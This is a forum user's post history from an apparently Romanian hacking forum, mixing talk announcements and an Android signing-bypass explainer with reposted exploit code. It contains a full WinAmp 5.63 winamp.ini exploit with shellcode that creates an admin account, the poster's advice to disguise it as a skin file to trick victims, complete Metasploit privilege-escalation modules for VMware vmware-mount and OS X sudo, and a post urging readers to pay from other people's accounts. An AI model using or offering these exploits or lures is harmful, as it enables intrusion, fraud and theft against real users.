Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Steven's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real. This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata. Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension. Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact. Sursa: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Kewl stuff
  2. Nytro
    Kali Linux - Backdooring Windows 8 https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70 Description: In this video you will learn how to exploit windows 8 using metasploit framework and how you can maintain your access on Windows 8 Using Kali Linux and metapsloit. Sursa: Kali Linux - Backdooring Windows 8
  3. Nytro
    Gps Hacking Description: GPS Hacking For More Information please visit : Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV Sursa: Gps Hacking
  4. Nytro
    Windows Universal Privilege Escalation Exploit Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo Skiddie, dar poate util/necesar. Sursa: Windows Universal Privilege Escalation Exploit
  5. Nytro
    Android Master Key Vulnerability—PoC Rohit T August 28, 2013 The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It’s very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let’s look into what the issue is, how hackers can exploit it, and what needs to be done to fix it. How Does Android Code Signing Work? Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the application MyFirstApp.apk application which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue. Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. Why would you want to sign the piece of code? For two reasons basically—authenticity and integrity. Before installing any application, I want to make sure that the application isn’t tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building and application and signing it with a certificate, you basically have an APK file at the end. MyFirstApp.apk MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator. APK files are nothing but collection of zip files. So if you rename an .apk extension as .zip you will be able to see the contents of the file. As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest-value of each file in the archive. Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF: Now try to modify any of these files; for example, modify the launch image file inside MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using the adb and you will find that Android rightly notices it and shows this message: How Is the Attack Accomplished? The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code. The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn’t prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below. The ic_launcher.png file is something that I have added to the existing file and created a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate and Android happily accepts the same. How Is This Even Possible? This is possible because Android verifies the first version of any file in archive but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is a fake but what gets verified for signature is legitimate part. What Are the Implications? The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user’s knowledge, make background calls, take pictures and forward to mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the play store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system and their applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always internet connected mobile phones. The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers by publishing popular games in third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the play store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren’t going to help the cause. What Precautions Could Help Users to Stay Away from This? It’s important to download the apps only from the Google Play Store and, even while downloading from the play store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say “No” to side loading of applications. In short, make sure you identify the publisher of the application before you install one. Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available. Apart from these, an application also released in Play Store, “Blue Box Security Scanner,” will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program. Video Here is the video link that practically demonstrates how this can be accomplished: Sursa: Android Master Key Vulnerability—PoC
  6. Nytro
    [h=1]WinAmp 5.63 (winamp.ini) - Local Exploit[/h] # Exploit Title: winampevilskin.py # Date: 25 August 2013 # Exploit Author: Ayman Sagy <aymansagy@gmail.com> # Vendor Homepage: http://www.winamp.com/ # Version: 5.63 # Tested on: Windows XP Professional SP3 Version 2002 # CVE : 2013-4694 # # Ayman Sagy <aymansagy@gmail.com> August 2013 # # This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/ # Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security # # The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup # # # I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it # If you can make it work or find a solution for ASLR/DEP please contact me # # So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it # The egg and shellcode can be found in plain ASCII in memory # # Tested against Windows XP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 # run with Python 2.7 import sys, getopt, os def usage(): print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n') print('Usage: python ' + sys.argv[0] + ' -p <payload>') print('Payload could be:') print('\t[user] to create new admin account ayman/P@ssw0rd') print('\t[calc] run calculator') print('for e.g.: python ' + sys.argv[0] + ' -p user') #appdata = os.environ['APPDATA'] # Windows add admin user: ayman P@ssw0rd scadduser = ( b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" + "\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" + "\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" + "\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" + "\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" + "\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" + "\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" + "\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" + "\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" + "\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" + "\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" + "\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" + "\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" + "\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" + "\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" + "\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" + "\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" + "\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" + "\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" + "\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" + "\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" + "\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f" ) # http://shell-storm.org/shellcode/files/shellcode-739.php sccalc = (b"\x31\xC9"+ # xor ecx,ecx "\x51"+ # push ecx "\x68\x63\x61\x6C\x63"+ # push 0x636c6163 "\x54"+ # push dword ptr esp "\xB8\xC7\x93\xC2\x77"+ # mov eax,0x77c293c7 "\xFF\xD0" ) if len(sys.argv) < 2: usage() exit(1) try: opts, args = getopt.getopt(sys.argv[1:],'p:') except getopt.GetoptError: usage() exit(1) for opt, arg in opts: if opt == '-p': if arg == 'user': shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89 elif arg == "calc": shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23 else: print("Error: Invalid payload.\n") usage() sys.exit() #print(str(len(shellcode))) egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"+ "\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") sploit = ( # Unicode-friendly venetian egghunter writer # Setup Registers "\x50\x72\x50"+ # push eax twice "\x72" + # align "\x59\x72\x5f"+ # pop ecx pop edi "\x72" + "\x05\xc2\x02\x01"+ # 05 00020001 ADD EAX,1000200 "\x72"+ "\x2d\xc2\x01\x01"+ # 2D 00010001 SUB EAX,1000100 # EAX is now EAX+100 "\x72\x48"+ # dec eax 4 times "\x72\x48"+ "\x72\x48"+ "\x72\x48\x72"+ # Pave Ahead # write NOPs in locations that will stop later execution "\xc3\x86\xc2\x90"+ # C600 90 MOV BYTE PTR DS:[EAX],90 "\x72\x40\x72"+ # 40 INC EAX "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc2\x91" # 91 XCHG EAX,ECX "\x72" + # align # Start writing egghunter shellcode, EGG = aymn "\xc3\x86\x66"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x81"+ #81 "\x72\x40\x72"+ "\xc3\x86\xc3\x8a"+ #ca "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ "\x72\x40\x72"+ "\xc3\x86\x0f"+ "\x72\x40\x72"+ "\xc3\x86\x42"+ # 42 "\x72\x40\x72"+ "\xc3\x86\x52"+ "\x72\x40\x72"+ "\xc3\x86\x6a"+ "\x72\x40\x72"+ "\xc3\x86\x02"+ "\x72\x40\x72"+ "\x34" * 4 + # Padding "\xc3\xb0\x30"+ # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 "\x72" "\xc3\x86\x58"+ #58 "\x72\x40\x72"+ "\xc3\x86\xc3\x8d"+ #cd "\x72\x40\x72"+ "\xc3\x86\x2e"+ #2e "\x72\x40\x72"+ "\xc3\x86\x3c"+ # 3c "\x72\x40\x72"+ "\xc3\x86\x05"+ # 5 "\x72\x40\x72"+ "\xc3\x86\x5a"+ "\x72\x40\x72"+ "\xc3\x86\x74"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xaf"+ # ef "\x72\x40\x72"+ "\xc3\x86\xc2\xb8"+ "\x72\x40\x72"+ "\xc3\x86\x61"+ "\x72\x40\x72"+ "\xc3\x86\x79"+ "\x72\x40\x72"+ "\xc3\x86\x6d"+ "\x72\x40\x72"+ "\xc3\x86\x6e"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x8b"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xba"+ #fa "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xaa"+ #ea "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ # ff "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72"+ "\x57"+ # 57 PUSH EDI "\x72"+ # align "\xc3\x83"+ # C3 RETN "\x34" * 200 # Padding ) winamp = ("[Winamp]\r\nutf8=1\r\n" + "skin=" + sploit + "\r\n" "[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" + "[in_wm]\r\nnumtypes=7\r\n" + "type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" + "protocol0=0\r\navtype0=0\r\n" + "type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" + "protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" + "description2=Advanced Streaming Format (*.ASF)\r\n" + "protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" + "description3=Windows Media Stream\r\nprotocol3=1\r\n" + "avtype3=1\r\ntype4=MMSU://\r\n" "description4=Windows Media Stream\r\nprotocol4=1\r\n" + "avtype4=1\r\ntype5=MMST://\r\n" + "description5=Windows Media Stream\r\nprotocol5=1\r\n" + "avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode + "\r\nprotocol6=0\r\navtype6=0\r\n") #f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f.write(winamp) f.close() print("winamp.ini written, copy it into %APPDATA%\\Winamp") Sursa: WinAmp 5.63 (winamp.ini) - Local Exploit Pe Windows 7 nu mi-a mers. O sa incerc pe XP. Sugestie: Redenumiti fisierul in ".wsz" (Winamp Skin). Daca cineva da dublu click pe el, o sa il intrebe daca instaleaza skin-ul si ar trebui... sa se execute shellcode-ul. Si e posibil sa convingi pe cineva sa instaleze un nou skin de Winamp.
  7. Nytro

    Cont Payza.com

    Nytro replied to XoddX's topic in Cosul de gunoi

    Pastreaza-le. Ban permanent, fara conturi de pe sisteme de plati sau banci.
  8. Nytro
    VMWare Setuid vmware-mount Unsafe popen(3) Authored by Tavis Ormandy, egypt | Site metasploit.com VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File def initialize(info={}) super( update_info( info, { 'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)', 'Description' => %q{ VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Vulnerability discovery and PoC 'egypt' # Metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultOptions' => { "PrependSetresuid" => true, "PrependSetresgid" => true, }, 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2013-1662' ], [ 'OSVDB', '96588' ], [ 'BID', '61966'], [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ], [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ] ], 'DisclosureDate' => "Aug 22 2013" } )) # Handled by ghetto hardcoding below. deregister_options("PrependFork") end def check if setuid?("/usr/bin/vmware-mount") CheckCode::Vulnerable else CheckCode::Safe end end def exploit unless check == CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end # Ghetto PrependFork action which is apparently only implemented for # Meterpreter. # XXX Put this in a mixin somewhere # if(fork()) exit(0); # 6A02 push byte +0x2 # 58 pop eax # CD80 int 0x80 ; fork # 85C0 test eax,eax # 7406 jz 0xf # 31C0 xor eax,eax # B001 mov al,0x1 # CD80 int 0x80 ; exit exe = generate_payload_exe( :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded ) write_file("lsb_release", exe) cmd_exec("chmod +x lsb_release") cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount") # Delete it here instead of using FileDropper because the original # session can clean it up cmd_exec("rm -f lsb_release") end def setuid?(remote_file) !!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true") end end Sursa: VMWare Setuid vmware-mount Unsafe popen(3) ? Packet Storm
  9. Nytro
    Da, Intel, cu procesoarele lor CISC (Complex instruction set computing) incearca sa se bage peste ARM, care sunt procesoare RISC (Reduced instruction set computing). Acum problema se pune astfel: putere (Intel) sau consum mic (ARM)? Nu m-ar deranja un Intel Atom pe telefon, insa m-ar deranja ca bateria sa ma tina 2 ore.
  10. Nytro
    Sau cititi asta: Files ? Packet Storm Si faceti cateva plati de pe conturile altora, luati-va o ciocolata
  11. Nytro
    Faceti-le disclosure la alea duplicate. Mai exact, nu cred ca le ia lor 2 ani sa repare un XSS. Deci de multe ori nu cred ca e vorba de vreun duplicat. Ameninta ca il faci public, vezi macar ce zic.
  12. Nytro
    memcpy((void *)(1<<12), &patch_current, 1024);
  13. Nytro
    Scopul chat-ului este ca "discutiile offtopic" sa nu apara pe forum si sa se poarte acolo. Scopul forumului, ceea ce ma intereseaza pe mine, este sa fie curat, iar chat-ul ajuta in aceasta privinta. Cu alte cuvinte, luam 2 masuri: 1. Kabron isi pastreaza neutralitatea morala pe chat, nu face pe seful, nu injura si incearca sa pastreze o decenta in subiectele discutate pe chat. Nu da kick/ban doar pentru ca lui nu ii place un anumit user 2. Matt nu mai posteaza chiar toate lucrurile peste care da si face o selectie rapida: doar exploit-uri in soft-uri foarte cunoscute, nu orice plugin sau soft de care nu a auzit nimeni, doar stiri interesante Iar chat-ul nu se va inchide, indiferent cate mii de voturi veti baga voi pentru inchidere. Daca nu vi se pare util si nu va place, pur si simplu NU INTRATI ACOLO.
  14. Nytro
    Mac OS X Sudo Password Bypass Authored by Todd C. Miller, juan vazquez, joev | Site metasploit.com This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # # http://metasploit.com/ ## require 'shellwords' class Metasploit3 < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use # it at his own risk Rank = NormalRanking include Msf::Post::Common include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper SYSTEMSETUP_PATH = "/usr/sbin/systemsetup" SUDOER_GROUP = "admin" VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']] # saved clock config attr_accessor :time, :date, :networked, :zone, :network_server def initialize(info={}) super(update_info(info, 'Name' => 'Mac OS X Sudo Password Bypass', 'Description' => %q{ This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin or if the user has never run the sudo command. }, 'License' => MSF_LICENSE, 'Author' => [ 'Todd C. Miller', # Vulnerability discovery 'joev <jvennix[at]rapid7.com>', # Metasploit module 'juan vazquez' # testing/fixing module bugs ], 'References' => [ [ 'CVE', '2013-1775' ], [ 'OSVDB', '90677' ], [ 'BID', '58203' ], [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ] ], 'Platform' => 'osx', 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], [ 'Mac OS X x64 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86_64 } ], [ 'CMD', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 28 2013' )) register_advanced_options([ OptString.new('TMP_FILE', [true,'For the native targets, specifies the path that '+ 'the executable will be dropped on the client machine.', '/tmp/.<random>/<random>'] ), ], self.class) end # ensure target is vulnerable by checking sudo vn and checking # user is in admin group. def check if cmd_exec("sudo -V") =~ /version\s+([^\s]*)\s*$/ sudo_vn = $1 sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i) # check vn between 1.6.0 through 1.7.10p6 # and 1.8.0 through 1.8.6p6 if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) print_error "sudo version #{sudo_vn} not vulnerable." return Exploit::CheckCode::Safe end else print_error "sudo not detected on the system." return Exploit::CheckCode::Safe end if not user_in_admin_group? print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." Exploit::CheckCode::Safe end # one root for you sir Exploit::CheckCode::Vulnerable end def exploit if not user_in_admin_group? fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.") end # "remember" the current system time/date/network/zone print_good("User is an admin, continuing...") # drop the payload (unless CMD) if using_native_target? cmd_exec("mkdir -p #{File.dirname(drop_path)}") write_file(drop_path, generate_payload_exe) register_files_for_cleanup(drop_path) cmd_exec("chmod +x #{[drop_path].shelljoin}") print_status("Payload dropped and registered for cleanup") end print_status("Saving system clock config...") @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1] @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1] @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/) @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1] @network_server = if @networked cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1] end run_sudo_cmd end def cleanup print_status("Resetting system clock to original values") if @time cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? if @networked cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On") unless @network_server.nil? cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") end end print_good("Completed clock reset.") if @time end private def run_sudo_cmd print_status("Resetting user's time stamp file and setting clock to the epoch") cmd_exec( "sudo -k; \n"+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+ " -setdate 01:01:1970 -settime 00:00" ) # Run Test test = rand_text_alpha(4 + rand(4)) sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ') print_status("Testing that user has sudoed before...") output = cmd_exec('echo "" | ' + sudo_cmd_test) if output =~ /incorrect password attempts\s*$/i fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.") elsif output =~ /#{test}/ print_good("Test executed succesfully. Running payload.") else print_error("Unknown fail while testing, trying to execute the payload anyway...") end # Run Payload sudo_cmd_raw = if using_native_target? ['sudo', '-S', [drop_path].shelljoin].join(' ') elsif using_cmd_target? ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') end ## to prevent the password prompt from destroying session ## backgrounding the sudo payload in order to keep both sessions usable sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true' print_status "Running command: " print_line sudo_cmd output = cmd_exec(sudo_cmd) end # helper methods for accessing datastore def using_native_target?; target.name =~ /native/i; end def using_cmd_target?; target.name =~ /cmd/i; end def drop_path @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) } end # checks that the user is in OSX's admin group, necessary to change sys clock def user_in_admin_group? cmd_exec("groups `whoami`").split(/\s+/).include?(SUDOER_GROUP) end # helper methods for dealing with sudo's vn num def parse_vn(vn_str); vn_str.split(/[\.p]/).map(&:to_i); end def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']]) vn_parts = parse_vn(vn) ranges.any? do |range| min_parts = parse_vn(range[0]) max_parts = parse_vn(range[1]) vn_parts.all? do |part| min = min_parts.shift max = max_parts.shift (min.nil? or (not part.nil? and part >= min)) and (part.nil? or (not max.nil? and part <= max)) end end end end Sursa: Mac OS X Sudo Password Bypass ? Packet Storm
  15. Nytro
    [h=1]Kali Linux on Galaxy Note 10.1[/h] April 2, 2013 06. Kali Linux ARM Architecture The Samsung Galaxy Note 10.1 is a 10.1-inch tablet computer designed, developed, and marketed by Samsung. The tablet incorporates a 1.4 GHz quad-core Exynos processor and 2 GB of RAM. The touch screen works surprisingly well with Kali as well as the wireless card, however Bluetooth and audio are not yet functional on this image. [h=2]Stock Kali on Galaxy Note 10.1 – Easy Version[/h] If all you want to do is to install Kali on your Galaxy Note 10.1, follow these instructions: You’ll need at least 7 GB free on your internal SD card for our image. Root your Samsung Galaxy Note 10.1 if you have not already done so. Download the Kali Linux Galaxy Note 10.1 image from our downloads area. Rename the downloaded Kali image to linux.img and copy it to /storage/sdcard0. Download our recovery.img file from here and copy it to /storage/sdcard0. Get root on your Galaxy Note 10.1, change /storage/sdcard0, and backup your recovery partition: dd if=/dev/block/mmcblk0p6 of=recovery.img_orig dd the downloaded recovery.img image to the recovery partition: Alert! This process will overwrite your recovery partition. Please make sure you know what you are doing. You may brick your device if you fumble this. dd if=recovery.img of=/dev/block/mmcblk0p6 Reboot your Galaxy Note 10.1 into recovery mode. You can do this by turning it off, then press and hold both the power button and the volume up button. Once you see the “Samsung Galaxy Note 10.1? text appear, release the power button but keep pressing the volume up button. This should boot you into Kali and auto-login into Gnome. The root password is “changeme” (without the quotes!) Open the onscreen keyboard by going to : Applications -> Universal Access -> Florence Virtual Keyboard. Wireless works but seems to skip the scanning of networks without some massaging. If the Gnome Network Manager shows no wireless networks, simply add your wireless network as a “hidden” one and you should get connected as usual. You can modify, debug, and explore our image easily from within your Galaxy Note, using a wonderful Android App called Linux Deploy. Sursa: Kali Linux on Galaxy Note 10.1 | Kali Linux Official Documentation
  16. Nytro

    Wifite v2

    Nytro posted a topic in Programe hacking

